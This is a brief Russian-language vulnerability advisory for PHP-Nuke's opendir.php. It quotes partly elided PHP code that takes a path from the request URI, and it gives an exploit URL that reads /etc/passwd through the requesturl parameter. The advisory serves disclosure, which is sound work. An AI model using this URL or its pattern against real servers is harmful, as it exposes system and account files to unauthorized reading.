PHP-Nuke - автоматизированная новостная система специально для Интернета и Интранета. Новая уязвимость в PHP-Nuke позволяет загрузить любой "читаемый" файл. (например, /etc/passwd)
Код уязвимости:
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)
Эксплоит:
Следующий урл даст доступ к /etc/passwd:
http://www.example.com/opendir.php?requesturl=/etc/passwd
